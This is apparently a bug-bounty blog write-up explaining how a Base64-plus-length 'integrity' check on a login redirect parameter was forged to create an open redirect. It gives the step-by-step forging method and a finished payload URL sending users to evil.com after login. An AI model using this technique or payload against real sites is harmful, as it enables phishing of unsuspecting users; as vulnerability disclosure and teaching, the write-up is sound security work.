in

Weak Cryptography Leads To Open Redirect | by DarkLotus

DarkLotus

Hello Everyone!,
I hope you are doing good and safe. If you are a noob in bug hunting you can check my previous blog and today I am going to share an interesting finding of mine, that is Open Redirect Vulnerability.

What is Open Redirect?
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain and with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users and even if they verify these features, they will not notice the subsequent redirection to a different domain.

Let’s start!, We call our target as target.com. My first step is to always do recon because it plays an important role in finding bugs. Through waybackurls tool, I got many endpoints of the target and then I filtered the URLs having “redirect” parameter through grep command and the result was like this:

https://login.target.com/login?redirect=aHR0cHM6Ly9hcHAudGFyZ2V0LmNvbS9kYXNoYm9hcmR8MzJ8YUhSMGNITTZMeTloY0hBdWRHRnlaMlYwTG1OdmJTOWtZWE5vWW05aGNtUT0%3D

first of all, I copied the redirect value and changed “%3D” to “=” (URL-decoded), so now its look like this:

aHR0cHM6Ly9hcHAudGFyZ2V0LmNvbS9kYXNoYm9hcmR8MzJ8YUhSMGNITTZMeTloY0hBdWRHRnlaMlYwTG1OdmJTOWtZWE5vWW05aGNtUT0=

Its look like Base64 Encoded value so straight forward I decoded it and got this:

https://app.target.com/dashboard|32|aHR0cHM6Ly9hcHAudGFyZ2V0LmNvbS9kYXNoYm9hcmQ=

For a few seconds, I was wondering what the hell it is after URL. then I got to know that “32” is the length of the URL from “https” first “h” to “dashboard” last “d” and after this, they have given a token which is nothing but just Base64 Encoded value of the URL.

Server Backend Flow:
User Login -> Base64 decode redirect value -> checking the integrity by URL length & Encoded value -> If all good -> Redirect

Now you can imagine how I was feeling and my next step is to create a redirect to a malicious site. so for this, my first step is to count the length of the URL and then encode URL to Base64, very simple know?

Steps To Create:
1. First Count the Number of characters, symbols, numbers, etc in the URL:
https://evil.com => 16

2. Now simply Base64 Encode the URL:
https://evil.com => aHR0cHM6Ly9ldmlsLmNvbQ==

3. Use a pipe as separator and combine both the values along with malicious URL and now our payload looks like:
https://evil.com|16|aHR0cHM6Ly9ldmlsLmNvbQ==

4. Now just encode the payload in Base64:
aHR0cHM6Ly9ldmlsLmNvbXwxNnxhSFIwY0hNNkx5OWxkbWxzTG1OdmJRPT0=

5. Do URL encoding of “=” i.e “%3D”.

Simply put the final Base64 encoded value in the “redirect” parameter of vulnerable URL and we are ready to execute.

https://login.target.com/login?redirect=aHR0cHM6Ly9ldmlsLmNvbXwxNnxhSFIwY0hNNkx5OWxkbWxzTG1OdmJRPT0%3D

And after login, the site smoothly redirected to EVIL.COM. I hope you enjoyed this writeup! If you like my work buyme-a-coffee and follow me on twitter for some cool tricks.

Thank You


What do you think?

Leave a Reply

Your email address will not be published. Required fields are marked *

GIPHY App Key not set. Please check settings

Price alterations on Coinbase

$ASTR – 🚀THE SPACE RACE IS ON🚀